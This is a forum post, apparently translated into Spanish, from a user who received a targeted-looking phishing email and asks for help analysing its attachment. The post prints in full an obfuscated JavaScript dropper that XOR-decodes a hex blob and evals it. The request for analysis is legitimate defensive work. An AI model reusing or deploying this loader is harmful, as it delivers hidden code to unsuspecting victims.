Hace dos días, recibí un correo electrónico sospechoso.
El remitente era una lista de correo, de la que soy miembro, pero se originó a partir de un subdominio de webhosters (applegate.dreamhost.com). El contenido se relacionó aproximadamente con una discusión anterior en esa lista de correo (vea el contenido a continuación).
El correo contenía un enlace a un archivo .zip con mi nombre completo y titulado como documento .doc con la extensión de archivo .js.
Por lo general, simplemente ignoro dichos correos, pero lo que me hizo sospechar fue el hecho de que el correo electrónico estaba relacionado con una discusión anterior y contenía mi nombre completo, que no está registrado en esa cuenta ni tampoco lo usé en ningún correo electrónico en esa lista.
Así que decidí echarle un vistazo y descargar el archivo zip.
Ahora tengo un archivo javascript confuso y no sé cómo continuar desde aquí.
La secuencia de comandos consta de una gran cadena alfanumérica ilegible y una gran cantidad de operaciones de cadenas que parecen obtener el contenido original de esa cadena alfanumérica. (ver script abajo)
Texto del correo:
"Re: [<list name obfuscated>] Kaffee"
<br>
<br>
<a href=3D"http://soldbychuck.com/<full path obfuscated>"><name obfuscated></a>
JavaScript:
function ddtcz()
{
var qglpa="d4c6ec307dd1966e896bc517cf8361ce167c3566e6428b496fcdb6db6f7cfde4ccc769e3a7cec269a324ea047ac8067dcc65a4a5df6e7af3c64d9920a7b7df697af7a64e8524adb28f796bd9c69b6364a1564ead6aca469b606bf3163c2821d4673cec7ce867adaa71fcb73ab67ee4169a677af1028f7b70bef65d6d64c4640ff17ccbc7cac978cab28cc235e9228c5866b886da2d7fe8228b3e49b9a6ba087cde261b8f7ec686dcdb50e1447c256ab1c62c6e6dca86bac17cc6120da92ad1d45e8a5bf7a50efc45b3d44e833aedd26cd050c6e45df044a8040e725cd395cb1758e592af4121e3d33f9b70c1165b9e64e9740c7d7cdfe7ca2178ce526eb967aaa78e746ddb466d1b20df52aa6a4fef94deea5ce7a2aa6624d6128b577ddf27af9364c3124f4628c246eee469dd064b1f7bda56dd1021e9833a4e70bb365b8664dd840ec77ca657cd0578d3e26ebe7bcb96decc66e186ce5f20cdb21fb933bbf61c686effa28fb620f3170b1d65adf64dd340c317caeb7cf3878dad26a8b7bf587ca1a69a6a7ce787dee67ba6828a9835f4035bc528acc3ae8138b8238e0821d9f28a6d73c647ae7b6db3f7ce7a7db987ae6f66aa728a0e6bd3969c4f64b0564c8a6abcc69ab46bfeb63be220aec70d2665da964a2b40e767cadc7cf1078d2626ec55ade56df247bc0678f2e67b2266a187bc366d"+
"be74af0867a856cc2571fc624e4f28bee6eb5169c6164eb47bbf46ddad21ac533b4675dd26dec564f157bf506df0f73e807aaa86db437ca5f7dc027af3e66f2b28adb6bc0e69e6064e4164c5a6ae9f69a036beec63aae20e7166f9f7dcf864cdd64eb124a3528f1c7cd277af167dd1e6dd1721dbf33c3c75e0a75f066bf0869a697cfe06bbba60d6b28ddb20e786dfda7adc47ab8c67d567aa5b21d2a73b667affb6dd797cb5e7df2d7acb066de228b966bf0a69c3c64a5264c2e6aaa769dfa6bdac63c1920a0866af17dc0064aeb64e1e24a7228e9c7cc3a7aac57de456dc5d21f7c33ef675c1675ae76eaec7dbe666e586bd647ce3861b9b67a7366e4228b026fdb26dec17cf1e4cae569d007cf9c69bb620acb6baaf69bd964c7564c726ac3269c426bfca63b0321adf73cda7cb157aa4371f0073eee6fa836daf77cb034cefc69a207ce9869dc84eefb7aaa567d0565dac5dfca7aae464bd320ad42afcc60a607cd597cc5378ffb32e8727f3327c527fd0e7ff0c7fa5026e7e6fc246de887aa2769e2d64bd16cc466fddf67ca87abbc6de9426f156baeb67d2d65eef27f4b66f0e6da2c7fa977bdc327bab39c8b3ff8a26c1b6dbfb70bbf6de982aea024fa228a3f6eb897deee66fb86bc487ca9761fc267fba66ba520f7f7ae926dfd97bcd87dc9464fd77cbee24fbb28e776dc027af687a"+
"d4167f1f7ab6b21fb428e9273bd161b9c6ee7428cfc20ca329e576dae77ae4c7adf867ede7ae3c21e7673f7b7aec06df447ce497db487ad2b66cba28e086be9069d8164e4764d336abf769dca6ba1d63dae20b2b7aee56dbcc7be757de6964c1a7cd5024ec628dd76ec6269c0364b737bcbf6dba621d0b33aeb75f9e6db9c64f307baae6da2973b5e6fcca6dc167cf9e4cc0e69a597ca0169e544ed6d7ac9e67ad565e515dda17aa6964eb320ed72ace160dd67cf6b7cdd478dd132fd527f8f27f847fc8e7fc7d7fedc26e606fb2e6deac7ab3a69be864dce6cc086ffef67d857ac736db6826fa06bfa467dd765b2627f0266f1b6daaa7fa637bbc927c1d39ed93fda326f416da7270c3a6ddda2abe624eea28a586edc87dcb666e5e6bae47ca2a61b0c67e3066d7920e787ad8c6da297bd957de9964eb97cad024f2428d166da0c7ad937aa3a67e5b7acd521fcd28bb973fd661ca86ed3828e6220fea29e3c6dd227ab9f7ad5b67c987ae5621bae73f437ab386dbf87cec07df6a7af0466f3928c916be8669bbe64b7464ca66aef469cd16be0663f6e20e227ac9a6dc837bfbd7df1564e8f7cb6d24dcb28dc56ee7a69e6b64ec57bd4c6dfe921db933eae75ee66df9264c2d7bd156dbd073ad76fc806da507cdf54cade69aae7cc6869dc04ec707adb867bc565d3c5db527affe64a1d20a392a"+
"a0f60d2a7ca727cf1d78a5a32cfc27b2127bff7fbee7fa127fd2b26d0c6fbb46db757aa9069fe864d406cd986fcd867ce87ad006db3326a6d6bba467dcc65a9c27d1e66b086df257fa947bd3d27b7139c873fbc126c6d6db8670e276de5e2ace124f2028ebb6eff37df4a66b776bbcb7cae461cf567fd066f4920ffa7acd66da047bb787de0d64bda7cafa24b6028d276dad07ada97ab2667d5e7ae9721b8128acd73edc61c226ea0428cb220a6c29d0f6de437ae1b7ab6467b9e7aa6d21edf73af87ab636dc897ca127dae57abd666e2a28a736ba9969e7664f8464bb06ac2169e526ba5163c9d20f7e7ac966dd0d7ba957dc6b64f087cb2024b2d28c436ec0a69b6164bc07bd636dc8b21ff133c0075efb6dc4d64b017bc106da6e73a9b7af216de997cd487dda17ab9e66e1328f5c6bfbd69bb364bdb64e9d6aa7769de06be9563abc20aad66b727da2c64e8964ab724fae28db77ce467ad4f7df5a6dd5621c8b33d8d75c6575e6e21b2a33ba675d0975a3c21ee133d0675e1c75f0521cf033fdf75f3e6bc7a69f157cb286ba1760aa128ca220b5a6dcc07aa077ae5967eae7ad7121ea273bb37afcc6df487ce7c7ddd97aad366dc728ab26ba5869a3364a8d64b306aafd69dc46bb5163e6f20efb66ce87dd1c64a2f64a4724e9928d087cc347ad787df5d6dd4c21cab33f3c75d3d75d626e"+
"e607dcf466e666baec7cdb261c6667bae66e8328f266fd0a6df9e7cbef5cdf46de1465fbf78f344ea7f61a7764b386ddc158b9969ad97ca7760b5820d1321cc673ffc7cde37aa4671cc373dea7ea2969d3f7ae8428c146ed817be3f28fcf35ec228b5f66ccd6dade7fd8328c8049ff06be927ce8561f327ef1d6df5350faf47dbc6ad6462dca6db896be617ce4920b1a2abbb5bb9e6bb4a7abb661e4a78bf87cf3e61c1566c196fe5926d054ebcc61b2e64e5b6db4e5be7d71c417bb027cde36daf765f8147ebc6affd62fc36dc166bcfc7cb512aca021c5033d897ee3e69e3a7aff028db77cf3765a0678efa4ee5561da064a416dd4446d4669be565e0e6db6328f7c35a6a28f4f2aac054dfd54f922ae2528b7423d5d28c0345d6969c8f7ca4260e5f26dfc7ac0569c8766fbc6ce4267fba65e6120cc821ccb26cce7cc6f67ac95bc4e7cfeb7adef61dc066bbe6fc4b20e093bd263ed8a21c0826eeb7beba7dd5a6adf87ba447ca977ae7e20cf23af8924cf228fd131dcc21b7228ee123c2428d4c2ae2326e826de3970d976dd752adf133c277ede669d687afdb28dcc7cfb465fb778b4e4efc661e7564ad76dc7658ffa69ba97ce3560fde28eaa35cef28cba6efb27babe26c364ffe46dc4f7ce415bbef78bf96de686bfb361c8f69d8064dfb4eeab67a3f64a336ca726deae7ad9520e613a"+
"bd821a7e28ded23cd928aeb7caed65a1478bed4eb8761c8c64da06debe46e6f69fbc65ccb6daca33eea7aa3a6de637cbca7da557ad5e66d4628d127cb6f65a6b78f4a4ec5c61a3264a8f6df9458a3869acb7cc7b60cb133cb775a706bfbf69cb17cdf96bcb160dc428ad120f476dcb27ad2d7ae4467dfe7ac6b21df073a657aae26dc1f7ccd37df6f7aef166fd428e726eed869d7664b7a7bd906ddda33d4975f1d75deb6edb97deae66e0d6bc447cf8a61c1367aa166f4528bf67ba9569e417ec2a6dc155cb8967c5e5cac16dada65b0d78cdc20fe66cac969a4a7cf9b69ab424d2828d346bd5269b8a64af964ea86abb569fc86bc9163a9c21c2f73f017ca357aa6c71f7b73b567ef9269a6f7acc728dff78b4169b1a7cb2c60c4328b1035e6f28c276fc2b6db097cf275cd706dd0a65bcc78a514eb9261f9764fd96da5058e0469c567cfeb60c0620af221ee733e4e61e186ecb628ed020db478f2969ad87cf5260a6121b3173d247ed2569a817ac7f28ee067bab6afb062b9d5bba37cbf67ab976dd2969f3165f8728f8635ba128a6c66d066dcde7fd3f28e7749be96bfba7cf9361b5a7ed056dd0a50c3447f026af3462d1a6da606bd367cbef20c332aebb49b654ceb847b714cb244aca426aa95bf4b7ce7a7aecd6dac069f2f65a1a2ac4121d8333ffc67e186adba62bb25be0d7cf0a7a"+
"c5b6db6c69ede65e7726a3647e3778cb26daec66ad620e0f21de433c4967a376aa3c62d5f5be317cb8c7ac9b6da0069c0465c4326d075cab071ddb78b7e6db5328b9035af328f1b39b8533dd967f826aa0d62d3a5bc827ccb67ac1f6da1c69bdc65e3526ba25ff597ae7361f157cc7c6ddc820e586cf7969da67cba869df321db833bad67c7d6aff562c715be567cc1b7ae966dcde69f7f65e2a26c5658bab67a6a7bcc161cb67cf3661c2f67e8b66e5328f4435ca928ff338c1933a7567ad16ac0362f255bffb7ccce7ad946dfff69b0d65c2d26e455bb6269bcb7ec0c6df5b5cca867c4e4eded61d5864bb06dbac20ce278d4f69b097ca5c60fa824b1a28baa3aa3f21d8033aa567e246aa0862ef25bcf67cba17adf26db2b69e2f65fa626cce4bfa264eab67c907bce86de3320ec121e2233fe47adcd6de407cee57deff7af6866bc728fa06be9669e9764a4764bc46abb869fa76ba0663e5a20c9878e5269c307cf3260b4624d9328ebd6eb9869f0264e077bd1e6daf421a6733f2975e6c6dbe664cd27bb2a6dfc428fbd73b6d7ab8b6dc017cf637db597aa8866cd528c176bab369c9f64bb564afb6af5669f2a6be7f63c8720ef466b757dd9e64ff864f2424e2328fd87cea97ad0f7dd176da1521b4b33cd475ca275e636bb5569be27cfec6bb0660b4728d4720e8a6dde97ae737ae6967"+
"a9d7acdc21d0b73bf67ad306dadd7ccc57da747af5066e5e28c786bbd569e6f64fad64a516af6d69dd06bfe163ea620d9066df17da2d64b2464bdd24af328a097ce267adf67ddf16de8921c1833d1975c6a75d986fc066dd0e7ca924cc1e69e0d7ce8669ce620e876ecdb7da7566dfd6be877ce0e61e2e67ee966ffe28a6f20c476ceb569ddb7ce7069f6124a4a28a4c6da3c7adea7ad2e67d047ae8e21a2c28ef373c0961cbb6eace28ed320f7229ce46dc8c7ad747ad9567b747acdd21e5073f877bf7469e3a7ee9a6dad35ce8967ae25cc596dfc665dca78a8320c496cf1a69ce37ca3169a2824f4828eac6ec697dfd566cec6bc7e7ca2161f8167e8366ea428c6820e4378d9869b567cc0560b2b24b3c28bd56dbcc7acb77af3c67b2e7abb921ffc28a7773ca961afa6ee4928b8620ef129ca46dac57aa217affe67c167ae8121c9e73a837cdaa7aea071a1473b317ed6269de17ad8128e687fec17bed860e9328d9c35b9c28cde66c756dce57fd8b28d6149a4d6ba1a7cd1461fab7ecd46db4250b0847c276af0d62c346dd376bb487cab920b732aed15fa245bb5c6bdbf7aa8861efa78a7c7cdbe26abb5bdf260fde6dfe164e3564fd12aff821bd733fec7fd997bd0460b3326cfe5acbe7dca266f8e20f3d78b5a69d2a7ccb360e5c21b9e33cef75c606bbb469c7b7cc3d6bb8360e2528"+
"c9e20d946dcbc7ac2b7ab8167fcb7aa4321f0628dcc73faf75a3775ede75b5a21e0c33fd575fb175cc521d9d33";
var jlusw;
while(true){
try
{
jlusw=(new Function("rrxoc","var ujfnb=rrxoc"+wutob()+"/\S{5}/g),amdeo=\"\",vrhqs"+wutob()+"ile(vrhqs<ujfnb"+wutob()+"gth){amdeo+"+wutob()+"e"+wutob()+"ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);")(qglpa));
break;
}
catch(er)
{
}
}
return jlusw;
}
function wutob()
{
var nnyfm=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
return nnyfm[Math.floor(Math.random()*nnyfm.length)];
}
ddtcz();
¿Alguien puede ayudarme a averiguar qué está haciendo este script o qué tiene alguien e idea de cómo un atacante podría obtener estos datos privados?
¿Crees que esto es un ataque dirigido o solo parte de un ataque automatizado?
Nadie más en la lista recibió un correo similar. La cuenta de correo es de google y la lista de correo es un grupo de googl.